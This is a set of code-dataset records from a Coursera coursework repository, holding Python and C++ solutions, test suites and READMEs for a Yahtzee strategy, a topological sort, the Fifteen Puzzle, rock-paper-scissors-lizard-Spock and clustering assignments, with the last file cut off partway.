#2.4: hand some repeated values. 
Should return this \n # maxim value in the hnad times its number of occurances\n hand = (1,2,2,2,3,6,6)\n max_score = score(hand)\n # run the Test #2.4 and compare the expected vs actual output\n suite.run_test(str(max_score), str(12), \"Test #2.4: score\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \ndef run_suite_expected_value(expected_value):\n \"\"\"\n Some basic testing code for expected value function \n to be used in best strategy for play a Yahtzee game\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n print \"running expected_value function test...\"\n \n # test the exptected_value\n # Test #1.1: no die is held and number of free dice to roll\n # is zero. Should return zero expected value\n held_die = ()\n num_die_sides = 6\n num_free_dice = 0\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(0.0), \"Test #1.1: expected_value\")\n \n # Test #1.2: one die is held and number of free dice to roll\n # is zero. Should return that value of that die\n held_die = (1,)\n num_die_sides = 6\n num_free_dice = 0\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.2 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(1.0), \"Test #1.2: expected_value\")\n \n # Test #1.3: no die is held and number of free dice to roll\n # is 1. Should return that expected value of rolling all \n # possible combination of 1 die which for a 6 sided die\n # is 3.5\n held_die = ()\n num_die_sides = 6\n num_free_dice = 1\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(3.5), \"Test #1.3: expected_value\")\n \n # Test #1.4: one die of value 3 with 6 sides is held and number \n # of free dice to roll is 1. Should return the expected value \n # calculated as follows:\n # 1/6 * score(1,3)+ 1/6 * score(2,3) + 1/6 * score(3,3) +...\n # ...+ 1/6 * score (3,6) \n # = 1/6 * 3 + 1/6 * 3 + 1/6 * 6 +...+ 1/6 * 6 = 4.5\n held_die = (3,)\n num_die_sides = 6\n num_free_dice = 1\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(exp_value), str(4.5), \"Test #1.4: expected_value\")\n \n # Test #1.5: two dies with value 2 with 6 sides is held and number \n # of free dice to roll is 2. Should return the expected value \n # calculated as follows:\n # 1/36 * score(1,1,2,2) + 1/36 * score(1,2,2,2) + 1/36 * score(1,2,2,3)\n # +...+ 1/36 * score(1,2,2,6) + 1/36 * score(1,2,2,2) +\n # 1/36 * score(2,2,2,2) + 1/36 * score(2,2,2,3) +...\n # = sum of all 36 values\n held_die = (2,2)\n num_die_sides = 6\n num_free_dice = 2\n exp_value = expected_value(held_die, num_die_sides, num_free_dice)\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(round(exp_value,3)), str(5.833), \"Test #1.5: expected_value\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \n"
},
{
"alpha_fraction": 0.7532394528388977,
"alphanum_fraction": 0.7684506773948669,
"avg_line_length": 109.9375,
"blob_id": "227ae9b5b12229c3634cf46dd937151d3764cb8b",
"content_id": "bdc962e58fbb42561cc42436ed333a0ca34afd33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1775,
"license_type": "no_license",
"max_line_length": 435,
"num_lines": 16,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project4 Fifteen Puzzle/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #4 Fifteen Puzzles\n\nDeveloped the logic to solve the Fifteen Puzzles game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To see the solver in action, go [here](http://www.codeskulptor.org/#user46_p9CLHFUXsW_56.py) and press the play button on the top left corner. A window will pop up, with the unshuffled puzzle. Use arrow key to shuffle the puzzle as desired and then press the Solve button to visually solve the puzzle.\n\nLink to my test suite for the implementation:\n<http://www.codeskulptor.org/#user46_ZoVa3j3l3k_66.py>\n\nMini-project overview taken from course page can be found below:\n* This week's homework introduced you to the Fifteen puzzle and outlined the highlights of building a solver for the puzzle. As described in the homework, the solution process for a puzzle of size <a href=\"https://www.codecogs.com/eqnedit.php?latex=m&space;\\times&space;n\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?m&space;\\times&space;n\" title=\"m \\times n\" /></a> has three phases:\n\n1. Solve the bottom m-2 rows of the puzzle in a row by row manner from bottom to top. Each individual row will be solved in a right to left order.\n2. Solve the rightmost n-2 columns of the top two rows of the puzzle (in a right to left order). Each column consists of two unsolved positions and will be solved in a bottom to top order.\n3. Solve the upper left <a href=\"https://www.codecogs.com/eqnedit.php?latex=2&space;\\times&space;2\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?2&space;\\times&space;2\" title=\"2 \\times 2\" /></a> portion of the puzzle directly.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/08FqM/mini-project-description>\n"
},
{
"alpha_fraction": 0.7752858400344849,
"alphanum_fraction": 0.7832013964653015,
"avg_line_length": 112.5999984741211,
"blob_id": "f42639bbd59cf6b4a4de291b232f46b667097e2f",
"content_id": "2e7b2a80d3ad710a3ff1541b3dc9d48c47cd30e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2284,
"license_type": "no_license",
"max_line_length": 608,
"num_lines": 20,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project1 Rock-paper-scissors-lizard-Spock/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #1 - Rock-paper-scissors-lizard-Spock\n\nImplemented the another version of the classic rock-paper-scissors game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_xghMO1JnR7_2.py) and press the play button on the top left corner. A call to each of the five options--rock, paper, scissors, lizard, Spock, has already added in the code and the computer's choice is then randomly chosen with the result of the game printed on the console on the right. Rules for the modified version of rock-paper-scissors game can be found below in the mini-project overview:\n\nMini-project overview taken from course page can be found below:\n* Rock-paper-scissors-lizard-Spock (RPSLS) is a variant of Rock-paper-scissors that allows five choices. Each choice wins against two other choices, loses against two other choices and ties against itself. Much of RPSLS's popularity is that it has been featured in 3 episodes of the TV series \"The Big Bang Theory\". The Wikipedia entry for RPSLS gives the complete description of the details of the game.\n\n* In our first mini-project, we will build a Python function rpsls(name) that takes as input the string name, which is one of \"rock\", \"paper\", \"scissors\", \"lizard\", or \"Spock\". The function then simulates playing a round of Rock-paper-scissors-lizard-Spock by generating its own random choice from these alternatives and then determining the winner using a simple rule that we will next describe.\n\n* \"While Rock-paper-scissor-lizard-Spock has a set of ten rules that logically determine who wins a round of RPSLS, coding up these rules would require a large number (5x5=25) of if/elif/else clauses in your mini-project code. A simpler method for determining the winner is to assign each of the five choices a number:\n\t* 0 — rock\n\t* 1 — Spock\n\t* 2 — paper\n\t* 3 — lizard\n\t* 4 — scissors\n\n* In this expanded list, each choice wins against the preceding two choices and loses against the following two choices (if rock and scissors are thought of as being adjacent using modular arithmetic).\n\nComplete Mini-Project Description can be found at: \n<https://www.coursera.org/learn/interactive-python-1/supplement/ijRP5/mini-project-description>\n\n\n"
},
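The README's numbering trick can be checked directly: with the choices numbered 0-4 in the order listed, each choice beats the two numbers immediately before it modulo 5. A sketch under that rule (names are mine):

CHOICES = ["rock", "Spock", "paper", "lizard", "scissors"]

def rpsls_winner(a, b):
    """Return 0 for a tie, 1 if choice a wins, 2 if choice b wins."""
    diff = (CHOICES.index(a) - CHOICES.index(b)) % 5
    if diff == 0:
        return 0
    return 1 if diff in (1, 2) else 2

assert rpsls_winner("rock", "rock") == 0
assert rpsls_winner("paper", "rock") == 1       # paper covers rock
assert rpsls_winner("rock", "scissors") == 1    # rock crushes scissors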
{
"alpha_fraction": 0.6144601106643677,
"alphanum_fraction": 0.6178939342498779,
"avg_line_length": 32.29299545288086,
"blob_id": "3e65b027fea2416de2ca6f0543ab1cd1f17fc846",
"content_id": "788c17698866b8875428df3788f3e3e9c37e07ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5242,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 157,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project4 Game Yahtzee/game_yahtzee.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nYahtzee dice game fuction implmentation\nfor determining optimal strategy of playing\nSimplifications: only allow discard and roll, only score against upper level\n\"\"\"\n\n# Used to increase the timeout, if necessary\nimport codeskulptor\ncodeskulptor.set_timeout(20)\n\ndef gen_all_sequences(outcomes, length):\n \"\"\"\n Iterative function that enumerates the set of all sequences of\n outcomes of given length.\n \"\"\"\n \n answer_set = set([()])\n for dummy_idx in range(length):\n temp_set = set()\n for partial_sequence in answer_set:\n for item in outcomes:\n new_sequence = list(partial_sequence)\n new_sequence.append(item)\n temp_set.add(tuple(new_sequence))\n answer_set = temp_set\n return answer_set\n\n\ndef score(hand):\n \"\"\"\n Compute the maximal score for a Yahtzee hand according to the\n upper section of the Yahtzee score card.\n\n hand: sorted tuple representing full yahtzee hand\n\n Returns an integer score \n \"\"\"\n # initialize the local variables\n max_score = 0\n idx = 0\n # iterate over the hand\n while idx < len(hand):\n # find number of occurances for the value at current index\n # in hand\n num_occur = hand.count(hand[idx])\n # update the maximal score if conidition is met\n if num_occur * hand[idx] > max_score:\n max_score = num_occur * hand[idx]\n # bipass all occurances of the current value in hand to \n # the next index with a different value\n idx += num_occur\n \n return max_score\n\n\ndef expected_value(held_dice, num_die_sides, num_free_dice):\n \"\"\"\n Compute the expected value based on held_dice given that there\n are num_free_dice to be rolled, each with num_die_sides.\n\n held_dice: dice that you will hold\n num_die_sides: number of sides on each die\n num_free_dice: number of dice to be rolled\n\n Returns a floating point expected value\n \"\"\"\n # initialize local variables\n exp_score = 0\n # calculate all dice outcomes that can be rolled on a single die\n dice_outcomes = range(1, num_die_sides + 1)\n # calculate all possible combination dice that can be rolled\n # for num_free_dice\n poss_rolls = gen_all_sequences(dice_outcomes, num_free_dice)\n # iterate over all of these combinations and calculate the\n # expected score on concatenated held dice and\n # current possible dice roll combination\n for roll in poss_rolls:\n temp_roll = sorted(list(roll)+list(held_dice))\n exp_score += (1.0/((num_die_sides)**num_free_dice) * score(tuple(temp_roll)))\n \n return exp_score\n\n\ndef gen_all_holds(hand):\n \"\"\"\n Generate all possible choices of dice from hand to hold.\n\n hand: full yahtzee hand in the form of sorted tuple\n\n Returns a set of tuples, where each tuple is dice to hold\n \"\"\"\n # initialize local variables\n ans = set([()])\n # interate over all hand items\n for hand_item in hand:\n # for each possible dice hold combination for the hand \n # already added, calculate a new hold combination by \n # adding the current hand_item to it\n for hold in set(ans):\n new_hold = list(hold)\n new_hold.append(hand_item)\n ans.add(tuple(new_hold))\n return ans\n \n\n\ndef strategy(hand, num_die_sides):\n \"\"\"\n Compute the hold that maximizes the expected value when the\n discarded dice are rolled.\n\n hand: full yahtzee hand in the form of sorted tuple\n num_die_sides: number of sides on each die\n\n Returns a tuple where the first element is the expected score and\n the second element is a tuple of the dice to hold\n \"\"\"\n # initial local variables\n max_exp_score = 0\n # generate all possible holds\n poss_holds = 
gen_all_holds(hand)\n # iterate over all holds and find the max_exp_score\n # and the corresponding dice to hold\n for hold in poss_holds:\n curr_hold_exp_score = expected_value(hold, num_die_sides, \n len(hand) - len(hold))\n if curr_hold_exp_score > max_exp_score:\n max_exp_score = curr_hold_exp_score\n max_exp_hold = hold\n\n return (max_exp_score, max_exp_hold)\n\n###################################################################\n# example function call to strategy function \n# uncomment to run it\n###################################################################\n#def run_example():\n# \"\"\"\n# Compute the dice to hold and expected score for an example hand\n# \"\"\"\n# num_die_sides = 6\n# hand = (2,2)\n# hand_score, hold = strategy(hand, num_die_sides)\n# print \"Best strategy for hand\", hand, \"is to hold\", hold, \"with expected score\", hand_score\n# \n# \n#run_example()\n\n\n##################################################################\n# uncomment the below functions to run the test suit for the above\n# functions\n##################################################################\n#import user46_i4ScIuelhi_91 as poc_yahtzee_testsuite\n#poc_yahtzee_testsuite.run_suite_gen_all_holds(gen_all_holds)\n#poc_yahtzee_testsuite.run_suite_score(score)\n#poc_yahtzee_testsuite.run_suite_expected_value(expected_value)\n\n\n \n \n\n\n\n"
},
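The solver's expected_value is a brute-force average of score(held + roll) over every equally likely roll; a compressed Python 3 sketch of that idea (max(..., default=0) needs 3.4+, and the names are mine):

from itertools import product

def score(hand):
    return max((hand.count(v) * v for v in set(hand)), default=0)

def expected_value(held, sides, free):
    rolls = list(product(range(1, sides + 1), repeat=free))
    total = sum(score(tuple(sorted(held + r))) for r in rolls)
    return total / float(len(rolls))

assert expected_value((), 6, 1) == 3.5                   # one fair six-sided die
assert round(expected_value((2, 2), 6, 2), 3) == 5.833   # value asserted in the test suite above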
{
"alpha_fraction": 0.5517449975013733,
"alphanum_fraction": 0.5826104283332825,
"avg_line_length": 32.42361068725586,
"blob_id": "3189f0a3ba72feff402f4194d67d9e9355decabd",
"content_id": "94fd72217b661fa06ccf0d9558e1e9063d28e545",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4971,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 144,
"path": "/Algorithms on Graphs/Assignment2/toposort.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: toposort.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-03\r\n// description: Problem 2 of the second assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Compute a topological ordering of a given directed \r\n//\t\t\t\tacyclic graph (DAG) with n vertices and m edges \r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tDFS and acyclic functions and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.17/2.00 sec, max memory used: 37347328/536870912 bytes. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <algorithm> \r\n//#include <ctime>\r\n\r\nusing std::vector;\r\n\r\n// Recursively performs depth first search starting from a given vertice x and adds all the reachable\r\n// vertices to a vector \"order\" starting from the sink vertice (i.e. add all vertices in post order manner)\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e5; used.size() = adj.size(), used[i] = 0 for all 0 <= i < used.size();\r\n//\t\torder.size() = 0 ; 0 ≤ x ≤ adj.size()-1; \r\n// POST: \"order\" contains all vertices reachable from x (including x) in post order manner.\r\n//\t\t used[i] = 1 for all i = v where v = x OR/AND v = reachable vertice from x.\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n//\t\t used = keeps track of all the vertices that have already been visited\r\n//\t\t order = used to store all the visited vertices from source vertice x in post order \r\n//\t\t x = a vertice of adj \r\n\r\nvoid dfs(vector<vector<int> > &adj, vector<int> &used, vector<int> &order, int x) {\r\n\t\r\n\t//if the vertice has not been visited and is a sink\r\n\tif (used[x] == 0 && adj[x].size() == 0) {\r\n\t\tused[x] = 1;\t\t\t//mark as visited\r\n\t\torder.push_back(x);\t\t//push it to the back of order vector\r\n\t\treturn;\t\t\t\t\t\r\n\t}\r\n\telse if (used[x] == 0) {\r\n\t\tused[x] = 1;\t\t\t//else mark the vertice as visited\r\n\r\n\t\t// perfrom a depth first search on neighbour vertices reachable from x\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\t\tif (used[adj[x][v]] == 0)\r\n\r\n\t\t\t\tdfs(adj, used, order, adj[x][v]);\r\n\t\t}\r\n\r\n\t\torder.push_back(x);\r\n\t}\r\n\r\n\r\n}\r\n\r\n// Uses dfs helper function above to output the topological ordering for a given DAG adj\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e5; \r\n// POST: Outputs a vector with the vertices of DAG in topological ordering (i.e reverse post order) \r\n// PARAM: adj = an undirected acyclic graph represented in adjacancey list with n vertices and 2*m \r\n//\t\t edges where n is adj.size() \r\n\r\nvector<int> toposort(vector<vector<int> > adj) {\r\n\r\n\tvector<int> used(adj.size(), 0);\r\n\tvector<int> order;\r\n\r\n\r\n\t// for all vertices starting from vertice zero\r\n\t// populate the order vector containing all the visited vertices in\r\n\t// post order manner\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\r\n\t\tif (used[v] == 0)\r\n\t\t\tdfs(adj, used, order, v);\r\n\r\n\t}\r\n\r\n\t// reverse the order to get the topological ordering\r\n\tstd::reverse(order.begin(), order.end());\r\n\t\r\n\r\n\treturn order;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i 
= 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t}\r\n\tvector<int> order = toposort(adj);\r\n\tfor (size_t i = 0; i < order.size(); i++) {\r\n\t\tstd::cout << order[i] + 1 << \" \";\r\n\t}\r\n\t\r\n\t// A test case to check if the clustering function works. These are commented since the \r\n\t// assignment requires the clustering.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/******************************************************************************************\r\n\t//Test 1: output should be '4 3 1 2'\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tvector<int> order1 = toposort(adj1);\r\n\tfor (size_t i = 0; i < order1.size(); i++) {\r\n\t\tstd::cout << order1[i] + 1 << \" \";\r\n\t}\r\n\tstd::cout << std::endl;\r\n\r\n\t//Test 2: output should be '5 4 3 2 1'\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tadj2[5 - 1].push_back(3 - 1);\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(1 - 1);\r\n\tvector<int> order2 = toposort(adj2);\r\n\tfor (size_t i = 0; i < order2.size(); i++) {\r\n\t\tstd::cout << order2[i] + 1 << \" \";\r\n\t}\r\n\tstd::cout << std::endl;\r\n\r\n\tvector<vector<int> > adj3(100000, vector<int>());\r\n\tvector<int> order3 = toposort(adj3);\r\n\tfor (size_t i = 0; i < order3.size(); i++) {\r\n\t\tstd::cout << order3[i] + 1 << \" \";\r\n\t}\r\n\tstd::cout << std::endl;\r\n\r\n\t********************************************************************************************************************/\r\n\t\r\n}\r\n"
},
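A Python sketch of the same topological-ordering task via Kahn's (in-degree) algorithm, an alternative to the DFS post-order approach in the C++ file above; a valid ordering may differ from the C++ output when several vertices are simultaneously ready.

from collections import deque

def toposort(adj):
    """adj: adjacency lists of a DAG with vertices 0..n-1."""
    indeg = [0] * len(adj)
    for u in range(len(adj)):
        for v in adj[u]:
            indeg[v] += 1
    queue = deque(u for u in range(len(adj)) if indeg[u] == 0)
    order = []
    while queue:
        u = queue.popleft()
        order.append(u)
        for v in adj[u]:
            indeg[v] -= 1
            if indeg[v] == 0:
                queue.append(v)
    return order   # shorter than len(adj) would indicate a cycle

# the C++ file's first test, 0-based: edges 3->0, 2->0, 0->1
assert toposort([[1], [], [0], [0]]) == [2, 3, 0, 1]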
{
"alpha_fraction": 0.804724395275116,
"alphanum_fraction": 0.8104987144470215,
"avg_line_length": 118.125,
"blob_id": "3e726036781a4f3cc44a548f9a6507d406887ecf",
"content_id": "497de9ebaef21a06105c7d7afbf1f5ac3886849c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 721,
"num_lines": 16,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 4/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #4: Computing Alignments of Sequences\n\n* In Project 4, we will implement four functions. The first pair of functions will return matrices that we will use in computing the alignment of two sequences. The second pair of functions will return global and local alignments of two input sequences based on a provided alignment matrix. You will then use these functions in Application 4 to analyze two problems involving comparison of similar sequences.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/0AJya/project-4-description>\n\n## Application #4: Applications to Genomics and Beyond\n\n* In Project 4, you implemented dynamic programming algorithms for determining both global and local alignments of pairs of sequences. In this Application, we will demonstrate the utility of these algorithms in two domains. In the first part of the Application, we examine an interesting problem from genomics. (This is based on \"Introduction to Computational Genomics\", by Nello Cristianini and Matthew W. Hahn). We will compare two sequences that have diverged from a common ancestor sequence due to mutation. (Mutation here includes base-pair substitution, which changes the sequence content, and insertion/deletion, which change the sequence lengths.) In the second part of the Application, we consider words that have spelling mistakes.\n\nFor the genomics part of the Application, you will load several protein sequences and an appropriate scoring matrix. For the spelling correction part of the Application, you will load a provided word list. To simplify these tasks, you are welcome to use this [provided code](http://www.codeskulptor.org/#alg_application4_provided.py).\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-2/supplement/eQpUY/application-4-description>"
},
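To make the alignment-matrix idea in this overview concrete, here is a hedged sketch of a global alignment score computed by dynamic programming, using a simple +1 match / -1 mismatch-or-gap scheme rather than the course's scoring matrices (names and scoring are mine):

def global_alignment_score(x, y, match=1, penalty=-1):
    rows, cols = len(x) + 1, len(y) + 1
    s = [[0] * cols for _ in range(rows)]
    for i in range(1, rows):           # a prefix of x aligned against gaps
        s[i][0] = s[i - 1][0] + penalty
    for j in range(1, cols):           # a prefix of y aligned against gaps
        s[0][j] = s[0][j - 1] + penalty
    for i in range(1, rows):
        for j in range(1, cols):
            diag = s[i - 1][j - 1] + (match if x[i - 1] == y[j - 1] else penalty)
            s[i][j] = max(diag, s[i - 1][j] + penalty, s[i][j - 1] + penalty)
    return s[rows - 1][cols - 1]

assert global_alignment_score("AC", "AC") == 2
assert global_alignment_score("AC", "AG") == 0   # one match, one mismatch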
{
"alpha_fraction": 0.7016987204551697,
"alphanum_fraction": 0.7184991836547852,
"avg_line_length": 43.768802642822266,
"blob_id": "9481912d1525198d0adcd4584fb8cafa92abdb07",
"content_id": "20a32165ccfce24405508596b002baadd61fe8e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16071,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 359,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 3/alg_application3_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nContains the answers to all the questions for \nApplication #3 - Comparision of Clustering Algorithm\n\"\"\"\n\nimport random\nimport copy\nimport matplotlib.pyplot as plt\nimport time\nimport alg_cluster\nimport alg_clusters_matplotlib as clust_plt\nimport alg_project3_solution as pj3_sol\nimport alg_project3_viz as pj3_viz\n\n######################################################\n##### Code for Q1 Solution #####\n# Q1: Write a function gen_random_clusters(num_clusters) that creates \n# a list of clusters where each cluster in this list corresponds to one \n# randomly generated point in the square with corners (+/-1,+/-1). Use \n# this function and your favorite Python timing code to compute the \n# running times of the functions slow_closest_pair and fast_closest_pair \n# for lists of clusters of size 2 to 200. Once you have computed the running \n# times for both functions, plot the result as two curves combined in a single \n# plot. (Use a line plot for each curve.) The horizontal axis for your plot \n# should be the the number of initial clusters while the vertical axis should \n# be the running time of the function in seconds. Please include a legend in \n# your plot that distinguishes the two curves.\n\ndef gen_random_clusters(num_clusters):\n \"\"\"[summary]\n \n Arguments:\n num_clusters {[type]} -- [description]\n \n Returns:\n [type] -- [description]\n \"\"\"\n\n # initialize the cluster list to be returned\n cluster_lst = num_clusters * [0]\n\n for idx in range(num_clusters):\n # generate a random point between -1 and 1\n horz_center = random.uniform(-1.0, 1.0)\n vert_center = random.uniform(-1.0, 1.0)\n # create the cluster and add it to the list\n cluster_lst[idx] = alg_cluster.Cluster(set(), horz_center, vert_center, 1, 0)\n\n return cluster_lst\n\n# intialize the range of cluster size to be used \nclust_lens = range(2, 200)\n# intialize the fast and slow pair function times \ntime_slow_closest = []\ntime_fast_closest = []\n\n# clsts = gen_random_clusters(4)\n# print len(clsts)\n# print pj3_sol.slow_closest_pair(clsts)\n\n# calcualte the time to run the slow and fast functions for the closest pair\nfor clust_len in clust_lens:\n\n # generate the cluster list of size clust_lsn\n cluster_list = gen_random_clusters(clust_len)\n\n # calculate the closest pair in the cluster using slow algorithm and \n # store the time it takes to run the function for given cluster size\n start = time.time()\n pj3_sol.slow_closest_pair(cluster_list)\n end = time.time()\n time_slow_closest.append((end - start))\n # calculate the closest pair in the cluster using fast algorithm and \n # store the time it takes to run the function for given cluster size\n start = time.time()\n pj3_sol.fast_closest_pair(cluster_list)\n end = time.time()\n time_fast_closest.append((end - start))\n\n# plot the graphs of resilience vs number of nodes removed for each of the 3 graphs\n#plt.figure(1)\nplt.plot(clust_lens, time_slow_closest, '-b', label = 'slow_closest_pair')\nplt.plot(clust_lens, time_fast_closest, '-k', label = 'fast_closest_pair')\nplt.title('slow vs fast runtime of closest pair function in Visual Studio' )\nplt.xlabel('length of clusters')\nplt.ylabel('run times[sec]')\nplt.legend(loc = 'upper left')\nplt.xlim(2, 200)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n# uncommet to save the plot \n#plt.savefig(\"Q1_closest_pair_comparision.png\")\n\n\n######################################################\n# ##### Code for Q2 Solution #####\n# Use alg_project3_viz to create an image of the 
15 clusters generated by applying \n# hierarchical clustering to the 3108 county cancer risk data set. You may submit \n# an image with the 3108 counties colored by clusters or an enhanced visualization \n# with the original counties colored by cluster and linked to the center of their \n# corresponding clusters by lines. You can generate such an enhanced plot using our\n# alg_clusters_matplotlib code by modifying the last parameter of plot_clusters to be\n# True. Note that plotting only the resulting cluster centers is not acceptable\n\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_3108_URL)\n\n# generate cluster from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\n# create a deep copy since hierarchical_clustering modifies the references to the list\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\n# form clusters based on hierarchical clustering algorithm\ncluster_list = pj3_sol.hierarchical_clustering(singleton_list_cpy, 15)\nprint \"Displaying\", len(cluster_list), \"hierarchical clusters\" \n\n# generate the image for the 15 clusters formed using hierarchical clustering algorithm\nclust_plt.plot_clusters(data_table, cluster_list, True)\n\n######################################################\n##### Code for Q3 Solution #####\n# Use alg_project3_viz to create an image of the 15 clusters generated by applying 5 \n# iterations of k-means clustering to the 3108 county cancer risk data set. You may \n# submit an image with the 3108 counties colored by clusters or an enhanced visualization \n# with the original counties colored by cluster and linked to the center of their corresponding \n# clusters by lines. As in Project 3, the initial clusters should correspond to the 15 counties \n# with the largest populations.\n\n# form clusters based on k-mean clustering algorithm\ncluster_list = pj3_sol.kmeans_clustering(singleton_list, 15, 5)\nprint \"Displaying\", len(cluster_list), \"k-mean clusters\" \n\nclust_plt.plot_clusters(data_table, cluster_list, True)\n\n######################################################\n##### Q4 Solution #####\n# Which clustering method is faster when the number of output clusters is either a small \n# fixed number or a small fraction of the number of input clusters? Provide a short \n# explanation in terms of the asymptotic running times of both methods. You should assume \n# that hierarchical_clustering uses fast_closest_pair and that k-means clustering always \n# uses a small fixed number of iterations.\n#\n# Ans: let k = number of clusters\n# n = size of the input cluster_list\n# q = number of iterations (for k-mean clustering)\n\n# Then for hierarchical clustering, the time complexity is O((n - k) * (n * logn + n * (logn)^2)\n# which is ~ O(n^2 * (logn)^2) if k is small compared to n as stated in the above question\n\n# On the other hand, the time complexity of k-mean clustering is ~ O(q * n * k). Since k is small\n# compared to n and q is also a small fixed number, time complexity is O(n) which is much more\n# efficient than heirarchiacl clustering \n\n######################################################\n##### Q5 Solution #####\n# Use alg_project3_viz to create an image of the 9 clusters generated by applying hierarchical \n# clustering to the 111 county cancer risk data set. 
You may submit an image with the 111 \n# counties colored by clusters or an enhanced visualization with the original counties colored \n# by cluster and linked to the center of their corresponding clusters by lines.\n\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_111_URL)\n\n# generate clusters from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\n# create a deep copy since hierarchical_clustering modifies the references to the list\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n# form clusters based on hierarchical clustering algorithm\ncluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, 9) \n\n# generate the image for the 9 clusters formed using hierarchical clustering algorithm\nprint \"Displaying\", len(cluster_list_hierarc), \"hierarchical clusters\" \nclust_plt.plot_clusters(data_table, cluster_list_hierarc, True)\n\n######################################################\n##### Q6 Solution #####\n# Use alg_project3_viz to create an image of the 9 clusters generated by applying 5 \n# iterations of k-means clustering to the 111 county cancer risk data set. You may \n# submit an image with the 111 counties colored by clusters or an enhanced visualization \n# with the original counties colored by cluster and linked to the center of their \n# corresponding clusters by lines. As in Project 3, the initial clusters should correspond \n# to the 9 counties with the largest populations.\n\n# form clusters based on k-mean clustering algorithm\ncluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, 9, 5)\n\n# generate the image for the 9 clusters formed using k-means 